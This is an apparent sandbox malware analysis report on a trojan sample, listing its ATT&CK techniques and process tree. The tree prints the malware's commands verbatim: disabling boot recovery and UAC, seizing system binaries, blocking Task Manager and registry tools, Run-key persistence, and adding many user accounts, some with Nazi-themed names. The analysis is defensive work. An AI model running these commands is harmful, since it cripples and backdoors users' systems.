Malware Analysis Report

2024-09-11 05:40

Sample ID 240630-q76bzsscqq
Target personalize.exe
SHA256 8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7
Tags
defense_evasion discovery evasion exploit persistence ransomware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7

Threat Level: Known bad

The file personalize.exe was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion exploit persistence ransomware trojan

UAC bypass

Modifies boot configuration data using bcdedit

Possible privilege escalation attempt

Sets file to hidden

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Modifies file permissions

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Adds Run key to start application

Sets desktop wallpaper using registry

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Abuse Elevation Control Mechanism
T1548
Bypass User Account Control
T1548.002
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Modify Registry
T1112
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
File and Directory Permissions Modification
T1222
Windows File and Directory Permissions Modification
T1222.001
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Inhibit System Recovery
T1490
Defacement
T1491
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-30 13:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-30 13:55

Reported

2024-06-30 13:56

Platform

win11-20240508-en

Max time kernel

63s

Max time network

66s

Command Line

"C:\Users\Admin\AppData\Local\Temp\personalize.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe" C:\Windows\system32\reg.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\screenmelt.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\mbr.exe C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\mmc.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\taskmgr.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\msiexec.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\colorcmd.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\screenmelt.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\System32\mbr.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\colorcmd.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\system32\winnt64.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\mbr.exe C:\Windows\system32\cmd.exe N/A
File created C:\Windows\system32\winnt64.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\System32\winnt64.exe C:\Windows\system32\attrib.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Web\winntcus64.png C:\Windows\system32\cmd.exe N/A
File created C:\Windows\Web\winntcus64.png C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "70" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\PickerHost.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\personalize.exe C:\Windows\system32\cmd.exe
PID 4476 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\personalize.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 2800 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 2316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2800 wrote to memory of 780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 1464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2800 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 5040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 4912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 3032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2800 wrote to memory of 3284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 3284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2800 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2800 wrote to memory of 2956 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2800 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2800 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 3580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 2828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4580 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 1352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2800 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2800 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4940 wrote to memory of 4832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4940 wrote to memory of 4832 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2800 wrote to memory of 2396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2800 wrote to memory of 2396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2396 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2396 wrote to memory of 2288 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\personalize.exe

"C:\Users\Admin\AppData\Local\Temp\personalize.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\personalize.exe"

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\choice.exe

choice /c yn /n /m ""

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\cmd.exe

cmd.exe

C:\Windows\system32\attrib.exe

attrib +s +h C:\Windows\System32\mbr.exe

C:\Windows\system32\takeown.exe

takeown /F "C:\Windows\system32\taskmgr.exe"

C:\Windows\system32\icacls.exe

icacls "C:\windows\system32\taskmgr.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /F "C:\Windows\system32\mmc.exe"

C:\Windows\system32\icacls.exe

icacls "C:\windows\system32\mmc.exe" /grant everyone:F

C:\Windows\system32\takeown.exe

takeown /F "C:\Windows\system32\msiexec.exe"

C:\Windows\system32\icacls.exe

icacls "C:\windows\system32\msiexec.exe" /grant everyone:F

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\attrib.exe

attrib +s +h C:\Windows\System32\winnt64.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows NT Personalization tool" /T REG_SZ /F /D "C:\Windows\System32\winnt64.exe"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f

C:\Windows\system32\net.exe

net user /add NTCUS ntcus123

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTCUS ntcus123

C:\Windows\system32\net.exe

net user /add NTUSER ntcus124

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTUSER ntcus124

C:\Windows\system32\net.exe

net user /add NTDAT ntpersonalize

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add NTDAT ntpersonalize

C:\Windows\system32\net.exe

net user /add DC discord

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add DC discord

C:\Windows\system32\net.exe

net user /add cfs belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add cfs belgium

C:\Windows\system32\net.exe

net user /add leopoldII belgium

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add leopoldII belgium

C:\Windows\system32\net.exe

net user /add SCHJIEAB rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add SCHJIEAB rykn

C:\Windows\system32\net.exe

net user /add IZWYOKWYIEN rykn

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn

C:\Windows\system32\net.exe

net user /add asap asap

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add asap asap

C:\Windows\system32\net.exe

net user /add REICHTANGLE ig1

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add REICHTANGLE ig1

C:\Windows\system32\net.exe

net user /add SIEGHEIL hitler

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user /add SIEGHEIL hitler

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\timeout.exe

timeout /t 15 /nobreak

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=HAHAHAHAHAHA

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8

C:\Windows\system32\timeout.exe

timeout /t 15 /nobreak

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

